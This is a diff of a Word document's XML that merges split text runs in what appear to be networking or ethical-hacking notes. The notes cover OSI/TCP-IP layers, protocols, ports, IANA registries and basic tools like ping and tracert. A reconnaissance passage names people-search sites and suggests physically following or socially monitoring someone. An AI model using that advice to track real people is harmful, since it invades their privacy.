+            <w:hyperlink r:id="rId85" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6517,7 +6085,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId85" w:tooltip="IEEE 1849" w:history="1">
+            <w:hyperlink r:id="rId86" w:tooltip="IEEE 1849" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6552,25 +6120,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">IEEE Standard for </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>eXtensible</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Event Stream (XES) for Achieving Interoperability in Event Logs and Event Streams</w:t>
+              <w:t>IEEE Standard for eXtensible Event Stream (XES) for Achieving Interoperability in Event Logs and Event Streams</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6611,7 +6161,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId86" w:tooltip="IEEE 1855" w:history="1">
+            <w:hyperlink r:id="rId87" w:tooltip="IEEE 1855" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6646,25 +6196,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">IEEE Standard for Fuzzy </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>Markup</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Language</w:t>
+              <w:t>IEEE Standard for Fuzzy Markup Language</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6704,7 +6236,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId87" w:tooltip="IEEE 1901" w:history="1">
+            <w:hyperlink r:id="rId88" w:tooltip="IEEE 1901" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6741,7 +6273,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Broadband over </w:t>
             </w:r>
-            <w:hyperlink r:id="rId88" w:tooltip="Power line communication" w:history="1">
+            <w:hyperlink r:id="rId89" w:tooltip="Power line communication" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6791,7 +6323,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId89" w:tooltip="IEEE P1906.1" w:history="1">
+            <w:hyperlink r:id="rId90" w:tooltip="IEEE P1906.1" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6866,7 +6398,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId90" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId91" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6941,7 +6473,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId91" w:tooltip="IEEE 12207" w:history="1">
+            <w:hyperlink r:id="rId92" w:tooltip="IEEE 12207" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6970,7 +6502,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId92" w:tooltip="Information Technology" w:history="1">
+            <w:hyperlink r:id="rId93" w:tooltip="Information Technology" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7028,7 +6560,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId93" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId94" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7114,25 +6646,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">There are few standard ports in the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>system .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> All of them can be accessed </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>at :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>There are few standard ports in the system . All of them can be accessed at :</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId94" w:history="1">
+      <w:hyperlink r:id="rId95" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7483,23 +7002,7 @@
         <w:t>OSI Model</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> we just looked at is just a reference/logical model. It was designed to describe the functions of the communication system by dividing the communication procedure into smaller and simpler components. But when we talk about the TCP/IP model, it was designed and developed by Department of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Defense</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>DoD</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) in 1960s and is based on standard protocols. It stands for Transmission Control Protocol/Internet Protocol. The </w:t>
+        <w:t xml:space="preserve"> we just looked at is just a reference/logical model. It was designed to describe the functions of the communication system by dividing the communication procedure into smaller and simpler components. But when we talk about the TCP/IP model, it was designed and developed by Department of Defense (DoD) in 1960s and is based on standard protocols. It stands for Transmission Control Protocol/Internet Protocol. The </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7565,13 +7068,8 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The diagrammatic comparison of the TCP/IP and OSI model is as </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>follows :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The diagrammatic comparison of the TCP/IP and OSI model is as follows :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7599,7 +7097,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId95">
+                    <a:blip r:embed="rId96">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7678,13 +7176,8 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This layer parallels the functions of OSI’s Network layer. It defines the protocols which are responsible for logical transmission of data over the entire network. The main protocols residing at this layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>This layer parallels the functions of OSI’s Network layer. It defines the protocols which are responsible for logical transmission of data over the entire network. The main protocols residing at this layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7701,13 +7194,8 @@
         <w:t>IP –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> stands for Internet Protocol and it is responsible for delivering packets from the source host to the destination host by looking at the IP addresses in the packet headers. IP has 2 versions</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> stands for Internet Protocol and it is responsible for delivering packets from the source host to the destination host by looking at the IP addresses in the packet headers. IP has 2 versions:</w:t>
+      </w:r>
       <w:r>
         <w:br/>
         <w:t>IPv4 and IPv6. IPv4 is the one that most of the websites are using currently. But IPv6 is growing as the number of IPv4 addresses are limited in number when compared to the number of users.</w:t>
@@ -7746,23 +7234,7 @@
         <w:t>ARP –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> stands for Address Resolution Protocol. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>It’s</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> job is to find the hardware address of a host from a known IP address. ARP has several types: Reverse ARP, Proxy ARP, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Gratituous</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ARP and Inverse ARP. </w:t>
+        <w:t xml:space="preserve"> stands for Address Resolution Protocol. It’s job is to find the hardware address of a host from a known IP address. ARP has several types: Reverse ARP, Proxy ARP, Gratituous ARP and Inverse ARP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7778,13 +7250,8 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This layer is analogous to the transport layer of the OSI model. It is responsible for end-to-end communication and error-free delivery of data. It shields the upper-layer applications from the complexities of data. The two main protocols present in this layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>This layer is analogous to the transport layer of the OSI model. It is responsible for end-to-end communication and error-free delivery of data. It shields the upper-layer applications from the complexities of data. The two main protocols present in this layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7835,17 +7302,9 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This layer performs the functions of top three layers of the OSI model: Application, Presentation and Session Layer. It is responsible for node-to-node communication and controls user-interface specifications. Some of the protocols present in this layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> HTTP, HTTPS, FTP, TFTP, Telnet, SSH, SMTP, SNMP, NTP, DNS, DHCP, NFS, X Window, LPD. Have a look at </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId96" w:history="1">
+        <w:t xml:space="preserve">This layer performs the functions of top three layers of the OSI model: Application, Presentation and Session Layer. It is responsible for node-to-node communication and controls user-interface specifications. Some of the protocols present in this layer are : HTTP, HTTPS, FTP, TFTP, Telnet, SSH, SMTP, SNMP, NTP, DNS, DHCP, NFS, X Window, LPD. Have a look at </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId97" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7854,15 +7313,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> for some information about these protocols. Protocols other than those present in the linked article </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> for some information about these protocols. Protocols other than those present in the linked article are : </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7881,15 +7332,7 @@
         <w:t>HTTP and HTTPS –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> HTTP stands for Hyper-text transfer protocol. It is used by the World Wide Web to manage communications between web browsers and servers. HTTPS stands for HTTP-Secure. It is a combination of HTTP with </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SSL(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Secure Socket Layer). It is efficient in cases where the browser need to fill out forms, sign in, authenticate and carry out bank transactions.</w:t>
+        <w:t xml:space="preserve"> HTTP stands for Hyper-text transfer protocol. It is used by the World Wide Web to manage communications between web browsers and servers. HTTPS stands for HTTP-Secure. It is a combination of HTTP with SSL(Secure Socket Layer). It is efficient in cases where the browser need to fill out forms, sign in, authenticate and carry out bank transactions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7944,13 +7387,8 @@
           <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
         </w:pBdr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Headers(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>TCP,OSI,IPV4 and IPV6)</w:t>
+      <w:r>
+        <w:t>Headers(TCP,OSI,IPV4 and IPV6)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8001,7 +7439,7 @@
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:451.5pt;height:221.25pt">
-            <v:imagedata r:id="rId97" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
+            <v:imagedata r:id="rId98" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
             <v:shadow opacity=".5"/>
           </v:shape>
         </w:pict>
@@ -8042,7 +7480,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId98">
+                    <a:blip r:embed="rId99">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -8115,7 +7553,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId99">
+                    <a:blip r:embed="rId100">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -8172,7 +7610,7 @@
       <w:r>
         <w:pict>
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:451.5pt;height:149.25pt">
-            <v:imagedata r:id="rId100" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
+            <v:imagedata r:id="rId101" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -8222,15 +7660,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">There </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are  a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> total of 65536 ports available. Where one port can be used by different service and vice-versa.</w:t>
+        <w:t>There are  a total of 65536 ports available. Where one port can be used by different service and vice-versa.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8338,51 +7768,19 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>IANA</w:t>
-      </w:r>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Internet Assigned Number Authority]</w:t>
+        <w:t>The IANA</w:t>
+      </w:r>
+      <w:r>
+        <w:t>[Internet Assigned Number Authority]</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The IANA is the governing body of the internet. It is this body that maintains the IP addresses all over the world. Now since it not possible to control the whole world with a single organisation the IANA has subdivisions which are responsible for the internet at specific parts of the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>world .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> There are a total of 5 divisions or to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>says</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 5 sub- organisations of IANA. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>These sub divisions are called as RIR(s</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>)[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Regional internet registry]. The different subdivisions and the areas covered is given in the picture given below.</w:t>
+        <w:t xml:space="preserve">The IANA is the governing body of the internet. It is this body that maintains the IP addresses all over the world. Now since it not possible to control the whole world with a single organisation the IANA has subdivisions which are responsible for the internet at specific parts of the world . There are a total of 5 divisions or to says 5 sub- organisations of IANA. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>These sub divisions are called as RIR(s)[Regional internet registry]. The different subdivisions and the areas covered is given in the picture given below.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8407,7 +7805,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId101"/>
+                    <a:blip r:embed="rId102"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8431,44 +7829,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now these RIR(s) in turn assigns a range of IP(s) to different registered LIR(s) [Local Internet Registry]. These LIR(S) are nothing but </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>your</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ISP(s) [Internet Service Providers]. Examples of ISP(S) are </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ACTFiber</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> net, Tata Communications, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>BSNL</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> etc. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Let the see the responsibilities of each organisation, LIR is responsible for giving an unique IP address to each of their registered customers and also should log the data of the user. While the RIR and LIR has similar responsibility </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i.e</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> allocation of IP to their sub organisations and maintain records. Any violation of the specified rules will </w:t>
+        <w:t xml:space="preserve">Now these RIR(s) in turn assigns a range of IP(s) to different registered LIR(s) [Local Internet Registry]. These LIR(S) are nothing but your ISP(s) [Internet Service Providers]. Examples of ISP(S) are ACTFiber net, Tata Communications, BSNL etc. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Let the see the responsibilities of each organisation, LIR is responsible for giving an unique IP address to each of their registered customers and also should log the data of the user. While the RIR and LIR has similar responsibility i.e allocation of IP to their sub organisations and maintain records. Any violation of the specified rules will </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">put </w:t>
@@ -8493,13 +7859,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">And websites like Pipl.com and anywho.com can used to find few of the personal </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>details .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>And websites like Pipl.com and anywho.com can used to find few of the personal details .</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
@@ -8612,38 +7973,12 @@
         <w:t xml:space="preserve">We can use any possible way to </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">gather the information required. Either it may physically following someone or using passive means like following over the social media or using networking </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>tools .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Now in the case of networking we have few tools such as ipconfig, ping, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>nslookup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tracert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and few other tools over the network. </w:t>
+        <w:t>gather the information required. Either it may physically following someone or using passive means like following over the social media or using networking tools .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now in the case of networking we have few tools such as ipconfig, ping, nslookup , tracert and few other tools over the network. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8679,7 +8014,7 @@
       <w:r>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId102" w:tooltip="Internet Protocol" w:history="1">
+      <w:hyperlink r:id="rId103" w:tooltip="Internet Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8722,7 +8057,7 @@
       <w:r>
         <w:t xml:space="preserve">uration) in </w:t>
       </w:r>
-      <w:hyperlink r:id="rId103" w:tooltip="Microsoft Windows" w:history="1">
+      <w:hyperlink r:id="rId104" w:tooltip="Microsoft Windows" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8733,7 +8068,7 @@
       <w:r>
         <w:t xml:space="preserve"> is a </w:t>
       </w:r>
-      <w:hyperlink r:id="rId104" w:tooltip="Console application" w:history="1">
+      <w:hyperlink r:id="rId105" w:tooltip="Console application" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8744,7 +8079,7 @@
       <w:r>
         <w:t xml:space="preserve"> that displays all current </w:t>
       </w:r>
-      <w:hyperlink r:id="rId105" w:tooltip="TCP/IP" w:history="1">
+      <w:hyperlink r:id="rId106" w:tooltip="TCP/IP" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8755,7 +8090,7 @@
       <w:r>
         <w:t xml:space="preserve"> network configuration values and can modify </w:t>
       </w:r>
-      <w:hyperlink r:id="rId106" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
+      <w:hyperlink r:id="rId107" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8766,7 +8101,7 @@
       <w:r>
         <w:t xml:space="preserve"> (DHCP) and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId107" w:tooltip="Domain Name System" w:history="1">
+      <w:hyperlink r:id="rId108" w:tooltip="Domain Name System" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8791,38 +8126,17 @@
         <w:t xml:space="preserve">Ping – </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Allows you to send a signal to another device on the network to see if it is </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>active .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>How does it work</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>?:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> uses ICMP to send out an “echo request” to the destination device and gets back “echo response”  if the destination device is ACTIVE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ping –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>t  :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>: until stopped sends the packets.</w:t>
+        <w:t>Allows you to send a signal to another device on the network to see if it is active .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How does it work?: uses ICMP to send out an “echo request” to the destination device and gets back “echo response”  if the destination device is ACTIVE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ping –t  :: until stopped sends the packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8832,231 +8146,108 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Ping –n count</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> number of echo request to send.</w:t>
+        <w:t>Ping –n count:: number of echo request to send.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Tracert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">in windows)/traceroute( in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>liux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">)- </w:t>
+        <w:t xml:space="preserve">Tracert(in windows)/traceroute( in liux)- </w:t>
       </w:r>
       <w:r>
         <w:t>It lets you see step by step route a packet takes to the destination you specify.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Tarcert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –h </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>maxhoops</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
